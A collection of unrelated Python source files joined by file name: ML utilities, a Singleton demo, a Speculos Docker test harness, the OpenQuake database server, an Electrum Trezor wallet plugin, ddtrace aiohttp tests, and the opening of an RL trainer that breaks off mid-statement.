placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
Singleton.py | import threading
class Singleton(object):
_instance_lock = threading.Lock()
def __new__(cls, *args, **kwargs):
if not hasattr(Singleton, "_instance"):
with Singleton._instance_lock:
if not hasattr(Singleton, "_instance"):
Singleton._instance = object.__new__(cls)
return Singleton._instance
obj1 = Singleton()
obj2 = Singleton()
print(obj1, obj2)
def task(arg):
obj = Singleton()
print(obj)
for i in range(10):
t = threading.Thread(target=task, args=[i, ])
t.start()
|
speculos.py | import os.path
import threading
import socket
import atexit
import logging
import docker
from . import dongle
CommException = dongle.CommException
logger = logging.getLogger('speculos')
class SpeculosContainer:
"""
`SpeculosContainer` handles running the Bolos App under test within
the `speculos` Docker` image.
A `SpeculosContainer` instance is constructed with the Bolos App ELF
filename passed as `app` argument and with an optional tcp port passed
as `apdu_port` argument.
The Docker container mounts the directory of the `app` within the
container on the `/app` mountpoint and exposes the `apdu_port` as tcp
port linked to the default Speculos APDU port (9999).
The `start()` method starts running the container and starts a background
thread that reads and logs `stdout` and `stderr` output logs from the
container. Note that speculos is run in `headless` display mode.
Besides the `connect()` method creates a `ledgerblue` tcp connection to
the `speculos` process through the `apdu_port` tcp port.
"""
def __init__(self, app, apdu_port=9999,
automation_port=None, button_port=None):
self.app = app
self.apdu_port = apdu_port
self.automation_port = automation_port or (apdu_port + 1)
self.button_port = button_port or (apdu_port + 2)
self.docker = docker.from_env().containers
self.container = None
def start(self):
self.container = self._run_speculos_container()
self.log_handler = self._log_speculos_output(self.container)
atexit.register(self.stop)
logger.info("Started docker container: %s (%s)"
% (self.container.image, self.container.name))
def stop(self):
logger.info("Stopping docker container: %s (%s)..."
% (self.container.image, self.container.name))
self.container.stop()
self.log_handler.join()
def connect(self, debug=False):
if self.container is None:
raise dongle.CommException("speculos not started yet")
return dongle.Dongle(self.apdu_port,
self.automation_port,
self.button_port,
debug=debug)
def _run_speculos_container(self):
appdir = os.path.abspath(os.path.dirname(self.app))
args = [
'--display headless',
'--apdu-port 9999',
'--automation-port 10000',
'--button-port 10001',
'--log-level button:DEBUG',
'--sdk 2.0',
'/app/%s' % os.path.basename(self.app)
]
c = self.docker.create(image='ledgerhq/speculos',
command=' '.join(args),
volumes={appdir: {'bind': '/app', 'mode': 'ro'}},
ports={
'9999/tcp': self.apdu_port,
'10000/tcp': self.automation_port,
'10001/tcp': self.button_port,
})
c.start()
return c
def _log_speculos_output(self, container):
# Synchronize on first log output from container
cv = threading.Condition()
started = False
def do_log():
for log in container.logs(stream=True, follow=True):
nonlocal started
if not started:
with cv:
started = True
cv.notify()
logger.info(log.decode('utf-8').strip('\n'))
t = threading.Thread(target=do_log, daemon=True)
t.start()
with cv:
while not started:
cv.wait()
return t
|
dbserver.py | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2016-2018 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import time
import sqlite3
import logging
import threading
import subprocess
from openquake.baselib import config, sap, zeromq as z, workerpool as w
from openquake.baselib.general import socket_ready, detach_process
from openquake.baselib.parallel import safely_call
from openquake.commonlib import logs
from openquake.server.db import actions
from openquake.server import dbapi
from openquake.server import __file__ as server_path
db = dbapi.Db(sqlite3.connect, os.path.expanduser(config.dbserver.file),
isolation_level=None, detect_types=sqlite3.PARSE_DECLTYPES,
timeout=20)
db.cmd = lambda action, *args: getattr(actions, action)(db, *args)
# NB: I am increasing the timeout from 5 to 20 seconds to see if the random
# OperationalError: "database is locked" disappear in the WebUI tests
ZMQ = os.environ.get(
'OQ_DISTRIBUTE', config.distribution.oq_distribute) == 'zmq'
DBSERVER_PORT = int(os.environ.get('OQ_DBSERVER_PORT') or config.dbserver.port)
class DbServer(object):
"""
A server collecting the received commands into a queue
"""
def __init__(self, db, address, num_workers=5):
self.db = db
self.master_host = address[0]
self.frontend = 'tcp://%s:%s' % address
self.backend = 'inproc://dbworkers'
self.num_workers = num_workers
self.pid = os.getpid()
self.master = w.WorkerMaster(**config.zworkers)
def dworker(self, sock):
# a database worker responding to commands
with sock:
for cmd_ in sock:
cmd, args = cmd_[0], cmd_[1:]
if cmd == 'getpid':
sock.send(self.pid)
continue
try:
func = getattr(actions, cmd)
except AttributeError:
sock.send('Invalid command ' + cmd)
else:
sock.send(safely_call(func, (self.db,) + args))
def start(self):
"""
Start database worker threads
"""
# give a nice name to the process
w.setproctitle('oq-dbserver')
dworkers = []
for _ in range(self.num_workers):
sock = z.Socket(self.backend, z.zmq.REP, 'connect')
threading.Thread(target=self.dworker, args=(sock,)).start()
dworkers.append(sock)
logging.warn('DB server started with %s on %s, pid %d',
sys.executable, self.frontend, self.pid)
if ZMQ:
# start task_in->task_out streamer thread
c = config.zworkers
threading.Thread(
target=w.streamer,
args=(self.master_host, c.task_in_port, c.task_out_port)
).start()
logging.warn('Task streamer started from %s -> %s',
c.task_in_port, c.task_out_port)
# start zworkers and wait a bit for them
msg = self.master.start()
logging.warn(msg)
time.sleep(1)
# start frontend->backend proxy for the database workers
try:
z.zmq.proxy(z.bind(self.frontend, z.zmq.ROUTER),
z.bind(self.backend, z.zmq.DEALER))
except (KeyboardInterrupt, z.zmq.ZMQError):
for sock in dworkers:
sock.running = False
logging.warn('DB server stopped')
finally:
self.stop()
def stop(self):
"""Stop the DbServer and the zworkers if any"""
if ZMQ:
logging.warn(self.master.stop())
z.context.term()
self.db.close()
def different_paths(path1, path2):
path1 = os.path.realpath(path1) # expand symlinks
path2 = os.path.realpath(path2) # expand symlinks
# don't care about the extension (it may be .py or .pyc)
return os.path.splitext(path1)[0] != os.path.splitext(path2)[0]
def get_status(address=None):
"""
Check if the DbServer is up.
:param address: pair (hostname, port)
:returns: 'running' or 'not-running'
"""
address = address or (config.dbserver.host, DBSERVER_PORT)
return 'running' if socket_ready(address) else 'not-running'
def check_foreign():
"""
Check if we the DbServer is the right one
"""
if not config.dbserver.multi_user:
remote_server_path = logs.dbcmd('get_path')
if different_paths(server_path, remote_server_path):
return('You are trying to contact a DbServer from another'
' instance (got %s, expected %s)\n'
'Check the configuration or stop the foreign'
' DbServer instance') % (remote_server_path, server_path)
def ensure_on():
"""
Start the DbServer if it is off
"""
if get_status() == 'not-running':
if config.dbserver.multi_user:
sys.exit('Please start the DbServer: '
'see the documentation for details')
# otherwise start the DbServer automatically; NB: I tried to use
# multiprocessing.Process(target=run_server).start() and apparently
# it works, but then run-demos.sh hangs after the end of the first
# calculation, but only if the DbServer is started by oq engine (!?)
subprocess.Popen([sys.executable, '-m', 'openquake.server.dbserver',
'-l', 'INFO'])
# wait for the dbserver to start
waiting_seconds = 10
while get_status() == 'not-running':
if waiting_seconds == 0:
sys.exit('The DbServer cannot be started after 10 seconds. '
'Please check the configuration')
time.sleep(1)
waiting_seconds -= 1
@sap.Script
def run_server(dbpath=os.path.expanduser(config.dbserver.file),
dbhostport=None, logfile=config.dbserver.log,
loglevel='WARN'):
"""
Run the DbServer on the given database file and port. If not given,
use the settings in openquake.cfg.
"""
if dbhostport: # assume a string of the form "dbhost:port"
dbhost, port = dbhostport.split(':')
addr = (dbhost, int(port))
else:
addr = (config.dbserver.host, DBSERVER_PORT)
# create the db directory if needed
dirname = os.path.dirname(dbpath)
if not os.path.exists(dirname):
os.makedirs(dirname)
# create and upgrade the db if needed
db('PRAGMA foreign_keys = ON') # honor ON DELETE CASCADE
actions.upgrade_db(db)
# the line below is needed to work around a very subtle bug of sqlite;
# we need new connections, see https://github.com/gem/oq-engine/pull/3002
db.close()
# reset any computation left in the 'executing' state
actions.reset_is_running(db)
# configure logging and start the server
logging.basicConfig(level=getattr(logging, loglevel), filename=logfile)
DbServer(db, addr).start() # expects to be killed with CTRL-C
run_server.arg('dbpath', 'dbpath')
run_server.arg('dbhostport', 'dbhost:port')
run_server.arg('logfile', 'log file')
run_server.opt('loglevel', 'WARN or INFO')
if __name__ == '__main__':
if hasattr(os, 'fork') and not config.dbserver.multi_user:
# needed for https://github.com/gem/oq-engine/issues/3211
# but only if multi_user = False, otherwise init/supervisor
# will loose control of the process
detach_process()
run_server.callfunc()
|
trezor.py | import threading
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u, versiontuple
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin, Device
from electrum.transaction import deserialize
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Commercium"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, keystore, address):
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_request.py | import asyncio
import threading
from urllib import request
import aiohttp_jinja2
import pytest
from ddtrace import config
from ddtrace.contrib.aiohttp.middlewares import trace_app
from ddtrace.contrib.aiohttp.patch import patch
from ddtrace.contrib.aiohttp.patch import unpatch
from ddtrace.pin import Pin
from tests.utils import assert_is_measured
from tests.utils import override_global_config
from .app.web import setup_app
async def test_full_request(patched_app_tracer, aiohttp_client, loop):
app, tracer = patched_app_tracer
client = await aiohttp_client(app)
# it should create a root span when there is a handler hit
# with the proper tags
request = await client.request("GET", "/template/")
assert 200 == request.status
await request.text()
# the trace is created
traces = tracer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
template_span = traces[0][1]
# request
assert "aiohttp-web" == request_span.service
assert "aiohttp.request" == request_span.name
assert "GET /template/" == request_span.resource
# template
assert "aiohttp-web" == template_span.service
assert "aiohttp.template" == template_span.name
assert "aiohttp.template" == template_span.resource
async def test_multiple_full_request(patched_app_tracer, aiohttp_client, loop):
app, tracer = patched_app_tracer
client = await aiohttp_client(app)
# it should handle multiple requests using the same loop
def make_requests():
url = client.make_url("/delayed/")
response = request.urlopen(str(url)).read().decode("utf-8")
assert "Done" == response
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
await asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is created
traces = tracer.pop_traces()
assert 10 == len(traces)
assert 1 == len(traces[0])
async def test_user_specified_service(tracer, aiohttp_client, loop):
"""
When a service name is specified by the user
The aiohttp integration should use it as the service name
"""
unpatch()
with override_global_config(dict(service="mysvc")):
patch()
app = setup_app()
trace_app(app, tracer)
Pin.override(aiohttp_jinja2, tracer=tracer)
client = await aiohttp_client(app)
request = await client.request("GET", "/template/")
await request.text()
traces = tracer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
assert request_span.service == "mysvc"
template_span = traces[0][1]
assert template_span.service == "mysvc"
async def test_http_request_header_tracing(patched_app_tracer, aiohttp_client, loop):
app, tracer = patched_app_tracer
client = await aiohttp_client(app)
config.aiohttp.http.trace_headers(["my-header"])
request = await client.request("GET", "/", headers={"my-header": "my_value"})
await request.text()
traces = tracer.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert request_span.service == "aiohttp-web"
assert request_span.get_tag("http.request.headers.my-header") == "my_value"
async def test_http_response_header_tracing(patched_app_tracer, aiohttp_client, loop):
app, tracer = patched_app_tracer
client = await aiohttp_client(app)
config.aiohttp.http.trace_headers(["my-response-header"])
request = await client.request("GET", "/response_headers/")
await request.text()
traces = tracer.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert request_span.service == "aiohttp-web"
assert request_span.get_tag("http.response.headers.my-response-header") == "my_response_value"
def test_raise_exception_on_misconfigured_integration(mocker):
error_msg = "aiohttp_jinja2 could not be imported and will not be instrumented."
original__import__ = __import__
def mock_import(name, *args):
if name == "aiohttp_jinja2":
raise Exception(error_msg)
return original__import__(name, *args)
with mocker.patch("builtins.__import__", side_effect=mock_import):
with pytest.raises(Exception) as e:
__import__("ddtrace.contrib.aiohttp.patch")
assert error_msg == e.value
|
trainer_adv.py | # Copyright 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os.path as osp
import random
import numpy as np
import tensorflow as tf
import string
import pickle
import argparse
import pdb
from copy import deepcopy
import os
import pandas as pd
import git
from multiprocessing import Process
import multiprocessing as mult
import time
import q_agent as qa
import agent_data
from dqn_utils import *
import env_adv as envim
def RMSPropOptimizer(learning_rate=5e-4, momentum=0.05):
return qa.OptimizerSpec(
constructor=tf.train.RMSPropOptimizer,
lr_schedule=ConstantSchedule(learning_rate),
kwargs={'momentum' : momentum}
)
def AdamOptimizer(learning_rate=1e-3):
return qa.OptimizerSpec(
constructor=tf.train.AdamOptimizer,
lr_schedule=ConstantSchedule(learning_rate),
kwargs={}
)
def piecewise_exploration_schedule(num_timesteps, limit_rate=0.02):
return PiecewiseSchedule(
[
(0, 0.1),
(num_timesteps * 0.1, limit_rate),
], outside_value=limit_rate
)
def constant_exploration_schedule(constant_rate=0.05):
return ConstantSchedule(constant_rate)
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def set_global_seeds(i):
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
def get_session():
tf.reset_default_graph()
session = tf.Session()
return session
class logger(object):
def __init__(self, average_window, print_every,
log_file, agent_types):
self.agent_types = agent_types
self.episode_rewards = self.make_log_dict()
self.terminal_rewards = self.make_log_dict()
self.bellman_errors = self.make_log_dict()
self.grad_norm_min_logs = self.make_log_dict()
self.grad_norm_max_logs = self.make_log_dict()
self.qval_trains_log = self.make_log_dict()
self.qval_targets_log = self.make_log_dict()
self.mean_episode_reward = self.make_log_dict()
self.mean_terminal_reward = self.make_log_dict()
self.mean_bellman_errors = self.make_log_dict()
self.test_rewards = self.make_log_dict()
self.test_action_signal_corr = self.make_log_dict()
self.test_action_accuracy = self.make_log_dict()
self.average_window = average_window
self.print_every = print_every
self.log_file = log_file
def make_log_dict(self):
d = {}
for t in self.agent_types:
d[t] = []
return d
def log_type(self, a_type, agents, errors, grad_norms, qval_trains, qval_targets,
total_time, q_agents, iteration, args):
agents = [a for a in agents if a.a_type == a_type]
n_t_agents = len(agents)
rewards = np.zeros((
n_t_agents, args.T, args.n_batches
))
error_a = np.zeros((
